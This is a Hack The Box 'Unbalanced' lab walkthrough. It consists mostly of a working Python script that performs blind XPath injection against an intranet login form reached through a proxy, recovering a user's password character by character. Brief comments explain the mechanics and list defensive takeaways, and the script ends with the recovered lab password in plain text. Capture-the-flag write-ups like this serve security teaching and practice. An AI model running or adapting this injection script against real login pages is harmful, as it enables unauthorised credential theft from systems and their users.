Unbalanced — HTB Walkthrough

#!/usr/bin/env python
# Walkthrough script for the HTB "Unbalanced" lab: recovers one user's
# Password value from the intranet login form, one character at a time.
#
# What it shows: the Password form field is sent with XPath syntax in it
# (a closing quote and bracket, then `| //*[n][...]`). Presumably the server
# concatenates that field into an XPath query, so the injected union selects
# node n whenever the injected predicate is true -- confirm against the
# application source. The only signal read back is whether the response
# contains "Invalid credentials.", which makes the login page a yes/no oracle.
#
# Defensive takeaways:
#   * Build XPath queries with bound variables / precompiled expressions, or
#     reject quotes and brackets in credentials, instead of concatenating.
#   * Store password hashes, not values that a query can compare against.
#   * The traffic is noisy: up to 100 length probes plus up to 99 probes per
#     character, all POSTs to one URL with `string-length(` or `substring(`
#     in the Password field. Proxy or web logs that capture POST bodies
#     (an assumption about the logging setup) and simple rate limits would
#     surface it.
import requests
import string

characters = string.printable
http_proxy = "http://10.10.10.200:3128"
proxy_dict = {"http": http_proxy}
target_url = "http://172.31.179.1/intranet.php"
password = ""
end = " "
user_no = 3  # Change this to the user number you want
password_length = 0

# Text the page returns when the submitted query selects no node.
FAILURE_MARKER = "Invalid credentials."


def send_request(payload):
    """POST the login form through the proxy with `payload` as the password.

    The username is fixed to "manager"; the response object is returned
    unmodified so the caller can inspect its text.
    """
    form = {"Username": "manager", "Password": payload}
    return requests.post(target_url, data=form, proxies=proxy_dict)


def _predicate_held(response):
    """Return True when the failure marker is absent from the response body."""
    return FAILURE_MARKER not in response.text


# Phase 1: find the length by testing string-length(Password) = 1..100.
# If nothing matches, password_length stays 0 and phase 2 does no work.
for length in range(1, 101):
    print("\rTrying :" + str(length) + end)
    length_payload = (
        "'] | //*[{0}][string-length(Password) = {1}] | /foo [bar = '"
        .format(user_no, length)
    )
    temp = send_request(length_payload)
    if _predicate_held(temp):
        password_length = length
        print("\nLength of the password is : " + str(length) + "\n")
        break

# Phase 2: for each 1-based position, compare substring(Password, pos, 1)
# against every printable character and keep the first one that matches.
for position in range(1, password_length + 1):
    for candidate in characters:
        # A single quote would terminate the injected string literal, so it
        # can never be tested with this payload shape.
        if candidate == "'":
            continue
        # NOTE: `end` is passed positionally here, so it is printed as an
        # extra trailing space rather than acting as print's end= keyword.
        print("\rChecking position " + str(position) + " for character: " + str(candidate), end)
        payload = (
            "']|//*[{0}][substring(Password,{1},1) = '{2}'] | /foo [bar = '"
            .format(user_no, position, candidate)
        )
        response = send_request(payload)
        if _predicate_held(response):
            print("\nPasswords " + str(position) + " character is : " + str(candidate))
            password = password + str(candidate)
            break

print("\nThe password is : " + str(password))
ireallyl0vebubblegum!!!
